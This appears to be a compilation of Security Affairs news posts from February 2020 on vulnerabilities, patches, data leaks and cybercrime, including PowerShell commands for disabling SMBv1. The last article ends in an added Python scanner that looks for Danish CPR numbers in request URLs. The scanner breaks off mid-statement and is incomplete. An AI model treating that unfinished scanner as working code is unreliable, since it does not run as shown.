Since 2016, Microsoft has been urging admins to stop using SMBv1. Later versions of the protocol implement security enhancements such as encryption, pre-authentication integrity checks to prevent man-in-the-middle (MiTM) attacks, and insecure guest authentication blocking.

Now the Exchange team is reiterating the need to disable SMBv1 on Exchange servers.

“There is no need to run the nearly 30-year-old SMBv1 protocol when Exchange 2013/2016/2019 is installed on your system. SMBv1 isn’t safe and you lose key protections offered by later SMB protocol versions. If you want to learn more about SMBv1 and why you should stop using it, I’d recommend reading this blog post published and updated by Ned Pyle.” continues Microsoft.

“Microsoft publicly deprecated the SMBv1 protocol in 2014 and so we stopped installing it by default when using Windows Server 2016 1709 (RS3). Please see this KB for more information.”

In 2017, the Shadow Brokers hacking group released a collection of NSA exploits and hacking tools targeting Microsoft’s Windows OS, some of which were developed to exploit the SMBv1 protocol to execute commands on vulnerable servers with administrative privileges.

Two of the most popular exploits today implemented in several malware strains are EternalBlue and EternalRomance. The list of malware including the exploits is long and includes Emotet, TrickBot, WannaCry, Retefe, NotPetya, and the Olympic Destroyer.

SMBv1 is no longer installed by default since Windows 10 version 1709 and Windows Server version 1709, while the latest versions of the operating systems use SMBv3.

To check if SMBv1 is enabled on a Windows server, users can execute the following PowerShell commands depending on their Windows Server version.

Windows Server 2008 R2: By default, SMBv1 is enabled in Windows Server 2008 R2. Therefore, if the following command does not return an SMB1 value or an SMB1 value of 1, then it is enabled. If it returns an SMB1 value of 0, it is disabled.

Get-Item HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath}

Windows Server 2012: If the command returns false, SMBv1 is not enabled.

Get-SmbServerConfiguration | Select EnableSMB1Protocol

Windows Server 2012 R2 or higher: If the command returns false, SMBv1 is not enabled.

(Get-WindowsFeature FS-SMB1).Installed
Get-SmbServerConfiguration | Select EnableSMB1Protocol

If SMBv1 is enabled on their server, admins can disable it using the following commands.

Windows Server 2008 R2:

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -Type DWORD -Value 0 -Force

Windows Server 2012:

Set-SmbServerConfiguration -EnableSMB1Protocol $false -force

Windows Server 2012 R2 or higher:

Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
Set-SmbServerConfiguration -EnableSMB1Protocol $false

Pierluigi Paganini

(SecurityAffairs – Microsoft Exchange, SMBv1)

The post Microsoft recommends Exchange admins to disable the SMBv1 protocol appeared first on Security Affairs.

Siemens fixed multiple DoS flaws in several products

Siemens issued Patch Tuesday updates for February 2020 that fixed serious denial-of-service (DoS) flaws in several of its products.

Siemens released Patch Tuesday updates for February 2020 that address serious denial-of-service (DoS) flaws in several of its products.

According to the advisories released by the vendor, a high-severity DoS flaw affects Siemens SIMATIC PCS 7, SIMATIC WinCC and SIMATIC NET PC products.

“A Denial-of-Service vulnerability was found in SIMATIC PCS 7, SIMATIC WinCC and SIMATIC NET PC software when encrypted communication is enabled.” reads the security advisory published by Siemens. “The vulnerability could allow an attacker with network access to cause a Denial-of-Service condition under certain circumstances (versions prior to SIMATIC WinCC V7.3 or SIMATIC PCS 7 V8.1 are not affected as encrypted communication is not an option).”

The flaw could be exploited, if encrypted communication is enabled, by sending specially crafted messages to the vulnerable system over the network. An attacker could exploit the issue without system privileges or user interaction. The flaw, tracked with the ID SSA-270778, received a CVSS score of 7.5.


Siemens addressed another DoS vulnerability that affects some SIMATIC S7 CPUs. The vulnerability can be exploited by an unauthenticated attacker by sending specially crafted HTTP requests to TCP ports 80 or 443.

Siemens fixed a DoS flaw that resides in many of its products using Profinet-IO (PNIO) stack versions prior to 06.00.

Siemens fixed two of the flaws in several industrial products, both are related to the handling of SNMP messages.

Siemens also fixed an issue in its S7-1500 CPUs which can be exploited by sending specially crafted UDP packets to a device.

The complete list of DoS vulnerabilities addressed by the IT vendor is reported in the advisories published by the company.

Pierluigi Paganini

(SecurityAffairs – ICS, DoS)

The post Siemens fixed multiple DoS flaws in several products appeared first on Security Affairs.

Reading the 2019 Internet Crime Complaint Center (IC3) report

The FBI’s Internet Crime Complaint Center (IC3) released the FBI 2019 Internet Crime Report, a document that outlines cybercrime trends over the past year.

Here we analyze the FBI’s 2019 Internet Crime Complaint Center (IC3) report, one of the most interesting documents on the crime trends observed over the last 12 months.

The figure that most captures our attention is that victims of cybercrime lost $3.5 billion in 2019.

The FBI’s Internet Crime Complaint Center (IC3) report is based on the 467,361 complaints received by the authorities during 2019.

IC3 says that the losses reported by victims between 2015 and 2019 amounted to $10.2 billion.

The most frequently reported complaints were related to phishing attempts, non-payment/non-delivery scams, and extortion.

“IC3 received 467,361 complaints in 2019—an average of nearly 1,300 every day—and recorded more than $3.5 billion in losses to individual and business victims. The most frequently reported complaints were phishing and similar ploys, non-payment/non-delivery scams, and extortion.” reads the FBI’s Internet Crime Complaint Center (IC3) report.

“The most financially costly complaints involved business email compromise, romance or confidence fraud, and spoofing, or mimicking the account of a person or vendor known to the victim to gather personal or financial information.”

IC3 experts warn that cybercrime is becoming ever more sophisticated in order to evade detection, and it is getting harder for victims to discover the fraudulent activities.

“Criminals are getting so sophisticated,” said Donna Gregory, IC3 chief. “It is getting harder and harder for victims to spot the red flags and tell real from fake.”

“You may get a text message that appears to be your bank asking you to verify information on your account,” said Gregory. “Or you may even search a service online and inadvertently end up on a fraudulent site that gathers your bank or credit card information.”

The report confirms that Business Email Compromise (BEC), or email account compromise, continues to be a major concern: in 2019, IC3 recorded 23,775 complaints about this type of attack. BEC scams resulted in more than $1.7 billion in losses.

“In the last year, IC3 reported seeing an increase in the number of BEC complaints related to the diversion of payroll funds,” continues the report. “In this type of scheme, a company’s human resources or payroll department receives an email appearing to be from an employee requesting to update their direct deposit information for the current pay period. The change instead routes an employee’s paycheck to a criminal.”


The IC3 highlights the importance of reporting crimes to the authorities to prevent further criminal activities and track cyber crooks.

IC3 praised the work of the Recovery Asset Team (RAT) that was established in February 2018 to help victims recover funds lost due to cyber crimes.

In 2019, the team allowed victims to recover over $300 million stolen through online scams, a 79% return rate on reported losses.

Experts also state that tech support fraud continues to be a growing problem: in 2019, the IC3 received 13,633 complaints about this kind of crime from victims residing in 48 countries.

Authorities recorded losses amounting to over $54 million, representing a 40 percent increase when compared to 2018. Most of the victims of tech support fraud scams were over 60 years of age.

In 2019, the IC3 also received 2,047 complaints related to ransomware infections, with adjusted losses of over $8.9 million.

For additional info let me suggest reading the full 2019 Internet Crime Report.

Pierluigi Paganini

(SecurityAffairs – IC3, cybercrime)

The post Reading the 2019 Internet Crime Complaint Center (IC3) report appeared first on Security Affairs.

Crypto AG was spied for US, German intelligence agencies for decades

Swiss authorities are investigating allegations that the company Crypto AG, a Switzerland-based maker of encryption devices, was a front company for the CIA and German intelligence.

According to a joint report published by Germany’s ZDF public broadcaster and The Washington Post, the Swiss-based firm Crypto AG operated for the CIA and the German intelligence agency for decades, providing them with access to the encrypted communications of more than 120 countries.

The investigation conducted by the media is based on documents from the CIA and Germany’s BND foreign intelligence agency.

The list of Crypto’s customers included Iran, India and Pakistan, military juntas in Latin America and the Vatican.

The company had been completely under the control of the spy agencies since 1970. The documents explicitly refer to historical events in which the agencies used the access granted by Crypto AG to monitor Iran’s mullahs during the 1979 hostage crisis, fed Britain intelligence about Argentina’s military during the Falklands War, and caught Libyan officials congratulating themselves on the 1986 bombing of Berlin’s La Belle nightclub, which was frequented by American servicemen.

According to intelligence experts, in the 1980s, a large portion of foreign communications processed by US intelligence officials (40%) had been accessed through Crypto’s systems.

Crypto was liquidated in 2018, but its products are still in use in more than a dozen countries.

“Swiss Defense Ministry spokeswoman Carolina Bohren told The Associated Press that ‘following research carried out by the media’ her office had notified the Cabinet about the Crypto case on November 5, 2019. On Jan. 15, the decision was made to appoint a former supreme court judge to look into the reports and report back by the end of June.” reported the Associated Press.

“The events under discussion date back to 1945 and are difficult to reconstruct and interpret in the present-day context.”

The involvement in the surveillance activity of the company was a profitable business that allowed Crypto AG to amass millions of dollars paid by the CIA and BND.

“Foreign governments were paying good money to the US and West Germany for the privilege of having their most secret communications read by at least two (and possibly as many as five or six) foreign countries,” wrote a report by the CIA into the operation.

Intelligence experts had suspected the involvement of western spy agencies in Crypto since the 1990s; for this reason, Russia and China never trusted the company’s machines and did not use them.

The AP News cited a case that took place in 1992, when a Crypto representative was arrested in Iran and spent months in prison before being released after the BND allegedly paid a $1 million ransom.

Konstantin von Notz, a German lawyer and politician, member of the Alliance ’90/The Greens party, who sits on the parliamentary committee that oversees the BND, told ZDF that he will ask for more transparency on the case.

The BND used the proceeds generated from the sale of cryptography devices to fund field operations, while the CIA used the money to buy competitors and create the conditions for a monopoly for Crypto.

Erich Schmidt-Eenboom, a German intelligence expert who helped analyze the documents, told the APNews that it is not credible that the Swiss government was unaware of Crypto’s work for western intelligence.

“That’s not credible,” he said. “They shut both eyes.”

The Swiss government declared that it was informed of the case only in November 2019, and then decided to investigate it.

The Swedish firm Crypto International, which was formed after part of the original company was acquired by an investor in 2018, declared that it had “no connections to the CIA or the BND” and was very distressed by the reports.

Pierluigi Paganini

(SecurityAffairs – Crypto AG, intelligence)

The post Crypto AG was spied for US, German intelligence agencies for decades appeared first on Security Affairs.

Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw

Microsoft February 2020 Patch Tuesday updates address a total of 99 new vulnerabilities, including an Internet Explorer zero-day exploited in the wild.

Microsoft has released the Patch Tuesday updates for February 2020 that address a total of 99 vulnerabilities, including an Internet Explorer zero-day tracked as CVE-2020-0674 that was reportedly exploited by an APT group.

In January, Microsoft published a security advisory (ADV200001) that includes mitigations for the CVE-2020-0674 zero-day remote code execution (RCE) flaw.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to gain the same user permissions as the user logged into the compromised Windows device. If the user is logged on with administrative permissions, the attacker can exploit the flaw to take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it was working on a patch to address the issue; in the meantime, it suggested restricting access to JScript.dll as a workaround to mitigate this zero-day flaw.

The flaw was reported by Google’s Threat Analysis Group and Chinese cybersecurity firm Qihoo 360, the latter security company confirmed that the DarkHotel group is the threat actor that exploited the issue in attacks in the wild.

The first Darkhotel espionage campaign was spotted by experts at Kaspersky Lab in late 2014; according to the researchers, the APT group had been around for nearly a decade, targeting selected corporate executives traveling abroad.

According to the experts, threat actors behind the Darkhotel campaign aimed to steal sensitive data from executives while they are staying in luxury hotels, the worrying news is that the hacking crew is still active.

The attackers appeared to be highly skilled professionals who exfiltrated data of interest with surgical precision and deleted any trace of their activity. The researchers noticed that the gang never goes after the same target twice. The list of targets includes CEOs, senior vice presidents, top R&D engineers, and sales and marketing directors from the USA and Asia traveling for business in the APAC region.

Security researchers believe the APT group is a North Korea-linked nation-state actor.

Twelve of the vulnerabilities fixed by Microsoft this month are rated as critical in severity, and the remaining ones have been rated as important.

Microsoft Patch Tuesday updates for February 2020 also address four important-severity vulnerabilities: two privilege escalation flaws in Windows, an information disclosure bug affecting IE and Edge, and a secure boot bypass. All four flaws had been publicly disclosed before the company addressed them.

As usual, I suggest taking a look at the analysis of the security updates by Trend Micro’s Zero Day Initiative (ZDI).

Pierluigi Paganini

(SecurityAffairs – Patch Tuesday updates for February 2020 , hacking)

The post Microsoft Patch Tuesday updates for February 2020 fix IE 0day flaw appeared first on Security Affairs.

440M records found online in unprotected database belonging to Estée Lauder

A security expert discovered that the cosmetics firm Estée Lauder exposed 440 million records online in a database that was left unsecured.

The security expert Jeremiah Fowler discovered an unsecured database belonging to the cosmetics firm Estée Lauder that contained 440,336,852 records.

Estée Lauder is an American multinational manufacturer and marketer of prestige skincare, makeup, fragrance and hair care products, it owns multiple brands, distributed internationally through both digital commerce and retail channels.

Fowler discovered the unsecured database on January 30 and attempted to report its discovery to the company. 

“On January 30th I discovered a non-password protected database that contained a massive amount of records totaling 440,336,852. Upon further review I was able to see connections to New York based cosmetic company Estée Lauder.” reads the post published by the researcher. “I could see audit logs that contained a large number of email addresses in each document. I immediately sent a responsible disclosure notice to Estée Lauder alerting them to the exposure.”

The exposed data included user email addresses in plain text; the archive also contained internal email addresses from the @estee.com domain.

The archive included audit logs containing a large number of email addresses in each document. 


The archive also contained technical information, including IP addresses, ports, and paths, that could be used by attackers to gather intelligence on the company infrastructure.

“There were millions of records pertaining to middleware that is used by the Estée Lauder company. Middleware is software that provides common services and capabilities to applications outside of what’s offered by the operating system.” continues the post. “Data management, application services, messaging, authentication, and API management are all commonly handled by middleware. Another danger of this exposure is the fact that middleware can create a secondary path for malware, through which applications and data can be compromised.”

Fowler warns that the exposure of middleware records could allow attackers to create a secondary path for malware.

The good news is that the database was rapidly secured, no payment data or sensitive employee information was apparently stored in the archive. 

At this time it is not clear how many email addresses were exposed in the database or for how long the data was exposed online. The expert also remarked that it is not clear whether the data was accessed by third parties, including threat actors.

“It is unclear exactly how many “user” email addresses were exposed. It is also unclear how long the Estée Lauder database was exposed or who else may have accessed the records.” concluded the post.

Pierluigi Paganini

(SecurityAffairs – Data Leak, Estée Lauder)

The post 440M records found online in unprotected database belonging to Estée Lauder appeared first on Security Affairs.

Adobe addresses 42 flaws in its five products

Adobe February 2020 Patch Tuesday updates address a total of 42 vulnerabilities in five products, dozens of them rated as critical severity.

Adobe February 2020 Patch Tuesday updates address a total of 42 vulnerabilities in Framemaker, Acrobat and Reader, Flash Player, Digital Editions and Experience Manager products.

Most of the vulnerabilities (21) affect the Windows version of the Framemaker document processor. The most severe issues are classified as critical buffer overflow, heap overflow, out-of-bounds write, and memory corruption flaws. The vulnerabilities can lead to arbitrary code execution in the context of the current user.

The flaws were reported to the company through Trend Micro’s Zero Day Initiative by the researcher who goes online with the moniker “Kdot”.

Adobe also addressed a total of 17 flaws in the Windows and macOS versions of its Acrobat and Reader products.

The IT firm addressed critical memory corruption issues that can be exploited by attackers to execute arbitrary code on vulnerable systems, and critical privilege escalation bugs that can allow an attacker to write arbitrary files to the system. The remaining flaws in Acrobat and Reader products have been rated as moderate severity memory leaks and important-severity information disclosure vulnerabilities.

The flaws were reported to Adobe by independent experts and researchers from Qihoo 360, Tencent, Renmin University of China, Cisco Talos, the Chinese Academy of Sciences, Baidu, and McAfee.

Adobe addressed a new critical arbitrary code execution flaw in Flash Player; successful exploitation could lead to arbitrary code execution in the context of the current user.

Adobe has also addressed two vulnerabilities in Digital Editions, including a critical command injection bug and an important information disclosure vulnerability.

The IT giant also fixed an important denial-of-service (DoS) issue that affects versions 6.5 and 6.4 of the Adobe Experience Manager.

Adobe confirmed that it’s not aware of any attacks exploiting these vulnerabilities in the wild.

Pierluigi Paganini

(SecurityAffairs – Adobe, Patch Tuesday)

The post Adobe addresses 42 flaws in its five products appeared first on Security Affairs.

OT attacks increased by over 2000 percent in 2019, IBM reports

According to IBM, OT attacks increased by over 2000 percent in 2019, most of them involved the Echobot IoT malware.

IBM’s 2020 X-Force Threat Intelligence Index report analyzes the threat landscape in 2019, the experts observed a spike in the number of OT attacks.

According to IBM X-Force, attacks targeting operational technology (OT) infrastructure increased by over 2000 percent in 2019 compared to 2018, and most of them involved the Echobot malware.

The number of cyber attacks targeting OT infrastructures in 2019 was the greatest ever observed.

“OT attacks hit an all-time high. Malicious activity targeting operational technology assets, most notably industrial control systems (ICS), increased 2000 percent year-over-year in 2019, marking the largest number of attempted attacks on ICS and OT infrastructure in three years.” reads the post published by IBM that introduces the report.

In the OT attacks observed by IBM researchers, hackers attempted to exploit a combination of known ICS/SCADA vulnerabilities, as well as password-spraying attacks.

Experts pointed out that the ICS attacks they observed were part of two specific campaigns, carried out by the Xenotime group and by the group IBM tracks as Hive0016 (APT33).

In June 2019, experts from the security firm Dragos reported that the Xenotime threat actor behind the 2017 Trisis/Triton malware attack was targeting electric utilities in the US and APAC.

“The overlap between IT infrastructure and OT, such as Programmable Logic Controllers (PLCs) and ICS, continued to present a risk to organizations that relied on such hybrid infrastructures in 2019.” continues the report. “The convergence of IT/OT infrastructure allows IT breaches to target OT devices controlling physical assets, which can greatly increase the cost to recover.”

Experts explained that once attackers gained a foothold on the target network, they used lateral movement to reach ICS systems from the inside using simple exploitation techniques.

Fortunately, IBM experts had not seen any Echobot attacks that caused disruptions or other serious problems for the affected systems.

Experts from IBM believe that the number of OT attacks will rapidly increase in the next months.

“X-Force expects that attacks against ICS targets will continue to increase in 2020, as various threat actors plot and launch new campaigns against industrial networks across the globe.” concludes IBM.

Pierluigi Paganini

(SecurityAffairs – OT, Echobot)

The post OT attacks increased by over 2000 percent in 2019, IBM reports appeared first on Security Affairs.

Dell SupportAssist flaw exposes computers to hack, patch it asap!

Dell addresses a flaw in the Dell SupportAssist Client software that could allow local attackers to execute arbitrary code with Administrator privileges.

Dell released a security update to address a vulnerability, tracked as CVE-2020-5316, in its SupportAssist Client software. The flaw could be exploited by local attackers to execute arbitrary code with Administrator privileges on affected systems.

Dell SupportAssist software is described as a tool that proactively checks the health of the system’s hardware and software. When an issue is detected, the necessary system state information is sent to Dell for troubleshooting.

To resolve issues, Dell SupportAssist interacts with the Dell Support website and automatically detects the Service Tag or Express Service Code of the Dell product.

The utility performs hardware diagnostic tests and analyzes the hardware configuration of the system, including installed device drivers, and is able to install missing or available driver updates.


The software leverages a local web service that is protected using the “Access-Control-Allow-Origin” response header and restrictions that accept commands only from the “dell.com” website or its subdomains.

The SupportAssist software is pre-installed on most new Dell computers running Windows.

“A locally authenticated low privileged user could exploit this vulnerability to cause the loading of arbitrary DLLs by the SupportAssist binaries, resulting in the privileged execution of arbitrary code.” reads the security advisory published by Dell.

The issue is an uncontrolled search path vulnerability that was reported by the security expert Eran Shimony from CyberArk. The CVE-2020-5316 flaw received a high-severity CVSSv3 base score of 7.8.

The vulnerability affects the following SupportAssist versions:

• Dell SupportAssist for business PCs version 2.1.3 or earlier
• Dell SupportAssist for home PCs version 3.4 or earlier

Dell addressed the issue with the release of SupportAssist for business PCs version 2.1.4 and SupportAssist for home PCs version 3.4.1.

Dell urges users to update the SupportAssist software on their systems as soon as possible.

All versions of SupportAssist will automatically install the latest released version if automatic upgrades are enabled; otherwise, the steps for a manual update of the client for home PCs are:

  1. Open SupportAssist.
  2. In the top-right corner of the SupportAssist window, click the ‘Settings’ icon, and then click ‘About SupportAssist’. SupportAssist automatically checks whether a newer version is available.
     • If no update is available, a message indicating that the latest version of SupportAssist is installed is displayed.
     • If a newer version of SupportAssist is available, the ‘Update Now’ link is displayed.
  3. Click ‘Update Now’; the latest version of SupportAssist is downloaded and installed on the system.

For a manual update of SupportAssist for business PCs, refer to the Dell SupportAssist for business PCs deployment guide.

In May 2019, security researcher Bill Demirkapi disclosed a critical remote code execution vulnerability (CVE-2019-3719) in the Dell SupportAssist utility that could be exploited to compromise systems remotely.

Demirkapi showed that the origin restrictions protecting the local web service could be bypassed, allowing an attacker to make SupportAssist download and execute code from a server under the attacker's control.

Pierluigi Paganini

(SecurityAffairs – hacking, Dell)

Safer internet day – Cybercrime facts Infographic

Dear readers, for Safer Internet Day 2020 I have created a simple infographic showing cybercrime facts from 2019.

Enjoy it!

Pierluigi Paganini

(SecurityAffairs – cybercrime, hacking)

The Altsbit exchange will exit in May following a hack

The Italy-based cryptocurrency exchange Altsbit announced that it has suffered a security breach that led to the theft of its customers' funds.

Cryptocurrency exchange Altsbit recently disclosed a security breach; the company initially claimed that hackers had stolen almost all of its customers' deposits.

The Italian trading firm disclosed the incident on February 5, stating that only a “small part” of customer funds had escaped the theft because it was held in cold wallets, which are not reachable from the Internet.

In a later update the company corrected that statement: a substantial share of the funds had in fact been stored in cold wallets, so they were never exposed to the attackers, and the exchange plans to return them to its customers.

“On February 5, 2020 the exchange Altsbit suffered an attack by hackers, in the attack unfortunately a certain quantity of coins were stolen from the platform. After a careful analysis we managed to understand the stolen quantities, fortunately a good part of the coins were kept on cold storage, these coins will be returned to the users of Altsbit exchange not having the possibility to compensate for these losses, they will be distributed among all users of the platform each coin will have its calculation based on the percentage that was saved during the attack ” reads a statement published by the company.

Altsbit stated that it has no means to compensate users for the stolen funds; the losses will therefore be spread across all of its users, in proportion to the share of each coin that survived the attack.

Altsbit determined that the currently verified losses are:

  • BTC: 6.929 of 14.782 coins lost; 7.853 will be returned to users (53.10% refunded)
  • ETH: 23.21 of 32.262 lost; 9.052 will be returned to users (28.06% refunded)
  • ARRR: 3,924,082 of 9,619,754 lost; 5,695,672 will be returned to users (59.20% refunded)
  • VRSC: 414,154 of 852,726 lost; 438,572 will be returned to users (51.24% refunded)
  • KMD: 1,066 of 48,015 lost; 46,949 will be returned to users (97.77% refunded)

“The site said users who saw losses must apply for their partial refunds. The bitcoin and ether stolen were valued at around $63,000 at press time.” reported Coindesk.

Altsbit provided the following step-by-step instructions to request a partial refund of the available funds:

  • log in to the exchange
  • click on “funding” at the top of the “exchange” page
  • click on “withdraw”
  • fill in the address and amount (pay attention to the new balance)
  • enter the verification email or 2FA code
  • click on “withdraw”.

The company announced that the exchange will shut down on May 8, 2020; after that date it will no longer be possible to receive any refund.

At the time of writing it is not clear who is behind the attack; the @LulzSec hacking group has claimed responsibility for it.

Some users online speculate that the incident is cover for an exit scam.

Pierluigi Paganini

(SecurityAffairs – Altsbit, hacking)

Chinese Military personnel charged with hacking into credit reporting agency Equifax

The United States Department of Justice charged 4 Chinese military hackers with hacking into credit reporting agency Equifax.

The United States Department of Justice officially charged four members of the 54th Research Institute of China's People's Liberation Army (PLA), a component of the Chinese military, with hacking into the credit reporting agency Equifax.

The four members of the Chinese military unit are Wu Zhiyong (吴志勇), Wang Qian (王乾), Xu Ke (许可) and Liu Lei (刘磊); the DoJ's indictment also charges them with stealing Equifax's trade secrets.

The four men are still at large, residing in China.

In September 2017, Equifax Inc. disclosed a cybersecurity incident that impacted approximately 145 million U.S. consumers, as well as residents of the UK and Canada.

According to Attorney General William Barr and FBI Deputy Director David Bowdich, the Equifax data breach is one of the largest thefts of personal data ever uncovered.

“A federal grand jury in Atlanta returned an indictment last week charging four members of the Chinese People’s Liberation Army (PLA) with hacking into the computer systems of the credit reporting agency Equifax and stealing Americans’ personal data and Equifax’s valuable trade secrets.” reads the press release published by the DoJ.

“The nine-count indictment alleges that Wu Zhiyong (吴志勇), Wang Qian (王乾), Xu Ke (许可) and Liu Lei (刘磊) were members of the PLA's 54th Research Institute, a component of the Chinese military. They allegedly conspired with each other to hack into Equifax's computer networks, maintain unauthorized access to those computers, and steal sensitive, personally identifiable information of approximately 145 million American victims.”

The Equifax hack began with the exploitation of CVE-2017-5638, a vulnerability in the Apache Struts web framework. The Apache Software Foundation had released a fix in March 2017, but Equifax had not applied it to the affected systems, as an Apache spokeswoman also told Reuters.

“They used this access to conduct reconnaissance of Equifax’s online dispute portal and to obtain login credentials that could be used to further navigate Equifax’s network. The defendants spent several weeks running queries to identify Equifax’s database structure and searching for sensitive, personally identifiable information within Equifax’s system,” the DoJ continues.

According to the indictment, the state-sponsored hackers ran approximately 9,000 queries on Equifax’s system obtaining records for nearly half of all American citizens. Exposed data included names, birth dates, and social security numbers.

The hackers attempted to evade detection by routing traffic through approximately 34 servers located in nearly 20 countries, used encrypted communication channels within Equifax's network to hide the malicious traffic, and wiped log files on a daily basis.

In July 2019, The Wall Street Journal revealed that Equifax would pay around $700 million to settle with the Federal Trade Commission over the 2017 data breach. The company was also fined £500,000 by the U.K.'s privacy watchdog for failing to take appropriate steps to protect its customers.

“Today’s announcement of these indictments further highlights our commitment to imposing consequences on cybercriminals no matter who they are, where they are, or what country’s uniform they wear,” said FBI Deputy Director David Bowdich.  “The size and scope of this investigation — affecting nearly half of the U.S. population, demonstrates the importance of the FBI’s mission and our enduring partnerships with the Justice Department and the U.S. Attorney’s Office.  This is not the end of our investigation; to all who seek to disrupt the safety, security and confidence of the global citizenry in this digitally connected world, this is a day of reckoning.”

Pierluigi Paganini

(SecurityAffairs – hacking, Equifax)

Netanyahu’s party Elector app exposes data on over 6.5M Israelis

A misconfiguration in the Elector election-day app developed for Likud, Prime Minister Benjamin Netanyahu's party, may have exposed data on over 6.5 million Israelis.

A misconfiguration in an election-day app developed for Netanyahu's Likud party may have exposed the personal details of over 6.5 million Israelis.

The incident was reported by Verizon Media developer Ran Bar-Zik, and Israeli media outlets confirmed the data leak.

Bar-Zik explained that he discovered the huge trove of data while performing a security audit of the Elector app, developed by Elector Software for Likud, the Israeli political party led by Prime Minister Benjamin Netanyahu.

“Netanyahu is actually sending Likud activists into a serious security breach, one of the most serious that has been exposed in recent years in Israel.” reads the post published by Calcalist. “Because a major security failure in Elector’s app and system revealed all the Likud’s voter data ahead of the upcoming elections: a huge database of voters and containing up-to-date personal information – ID, full name, address, and phone – of close to 6.5 million Israelis with voting rights.”

At the time of writing it is not clear whether unauthorized parties also accessed the leaked information before the issue was discovered.

Bar-Zik decided to assess the app after privacy concerns were raised by local media in recent weeks.

The Likud app was designed to allow the party’s political supporters to sign up for news and updates during the upcoming Israeli election, on March 2.

The party published the app on the elector.co.il website.

Analysis of the app's client-side source code revealed a link to an API endpoint used to authenticate the site's administrators.

Bar-Zik pointed out that the endpoint required no authentication: anyone could query it and receive the site administrators' data in cleartext, including their passwords.

Using those credentials, Bar-Zik was able to access the site's backend, including a database containing the personal details of 6,453,254 Israeli citizens.

The database was an official, up-to-date copy of Israel's voter registry, the register that is made available to the parties ahead of an election.

“The information includes the ID number, full name, full address, father's name, ballot and voting address and voter ID – information that actually identifies all the senior citizens of Israel. This information was particularly up-to-date and comprehensive.” continues the post. “Bar-Zik himself said that following an apartment move, he updated his address in the Interior Ministry just three weeks ago. His latest address appeared in the uncovered database.”

The records in the database included personal details such as full name, phone number, ID card numbers, home addresses, gender, age, and political preferences.

Following the discovery of the data leak, the official website of the Elector app has been taken down.

Pierluigi Paganini

(SecurityAffairs – Elector app, hacking)

1.2 million CPR numbers of Danish citizens leaked through tax service

A glitch in the TastSelv Borger tax service has sent over one million Danish CPR numbers to the US companies Google and Adobe.

The Danish Agency for Development and Simplification has discovered the data leak that involved the TastSelv Borger service, which is managed by the US company DXC Technology.

The TastSelv service allows anyone with a tax liability in Denmark to view and change their tax return and annual statement and to pay outstanding tax.

Data, including CPR numbers, had been exposed for almost five years before the leak was discovered.

“We take this kind of case very seriously. And of course we need to be able to make sure that our suppliers handle all data according to applicable law and within the framework agreed upon with them.” states the Government Agency.

According to the Agency, the data was encrypted and Google and Adobe were not able to see the CPR numbers.

“Google Hosted Libraries have been designed to remove all information that allows identifying users before logging on. Thus, no user information is shared with Google in this process.” Google told the DR News website that first reported the news of the data leak.

Peter Kruse, cyber security expert and founder of the CSIS group, disputes this: in his assessment Google had access to 1.2 million Danes' CPR numbers because they were transmitted in plain text.

“The data received by Google is unencrypted. Google has been able to read data in unencrypted form,” Kruse estimates.

“Google has accessed 1.2 million Danes' CPR numbers.”

The Danish Agency for Development and Simplification downplayed the incident and maintained that the CPR numbers were encrypted.

The DR news website reported that the issue was triggered when users logged in to TastSelv Borger clicked on ‘Correct contact information’.

After a user corrected their contact information, an error in the application caused the CPR number to be included in a web address (URL) that was sent to Google and Adobe. Whatever is placed in a URL is readable by the server that receives the request even over HTTPS; it also reaches every third party the page loads resources from through the Referer header, and typically ends up in their server logs.
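As an added illustration of how to catch this failure mode (not the TastSelv code; the log lines below are constructed, not captured traffic), the following Python scans request URLs for CPR-shaped values and marks which ones went to hosts other than the first-party service. It assumes `tastselv.skat.dk` as the only first-party host and a simple `<timestamp> <method> <url>` log format; both are assumptions for the example:

```python
import re
from dataclasses import dataclass
from datetime import date
from typing import Iterator, List
from urllib.parse import parse_qsl, urlsplit

# Assumption for this example: the service's own host.  Anything else is a third party.
FIRST_PARTY_HOSTS = {"tastselv.skat.dk"}

# CPR layout: DDMMYY plus a four-digit sequence number, usually written with a hyphen.
CPR_RE = re.compile(r"(?<![\d-])(\d{2})(\d{2})(\d{2})-?(\d{4})(?![\d-])")
MOD11_WEIGHTS = (4, 3, 2, 7, 6, 5, 4, 3, 2, 1)


def valid_cpr_date(dd: str, mm: str, yy: str) -> bool:
    """The first six digits must form a real calendar date.  The century is
    encoded in the seventh digit; both centuries are tried here so a 29 February
    birthday is not rejected for the wrong reason."""
    for century in (1900, 2000):
        try:
            date(century + int(yy), int(mm), int(dd))
            return True
        except ValueError:
            pass
    return False


def cpr_mod11_ok(digits: str) -> bool:
    """Modulus-11 check that every CPR number issued before 2007 satisfies.
    Later numbers may legitimately fail it, so a failure lowers confidence
    rather than ruling the value out."""
    return sum(int(d) * w for d, w in zip(digits, MOD11_WEIGHTS)) % 11 == 0


@dataclass
class Finding:
    host: str
    third_party: bool
    where: str         # "path" or "query:<parameter name>"
    masked: str        # birth date kept, sequence number masked
    checksum_ok: bool


def cpr_candidates(text: str) -> Iterator[str]:
    for m in CPR_RE.finditer(text):
        dd, mm, yy, seq = m.groups()
        if valid_cpr_date(dd, mm, yy):
            yield dd + mm + yy + seq


def scan_url(url: str, first_party=FIRST_PARTY_HOSTS) -> List[Finding]:
    """Report CPR-shaped values in the path and query string of one URL."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    fields = [("path", parts.path)]
    fields += [(f"query:{k}", v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return [
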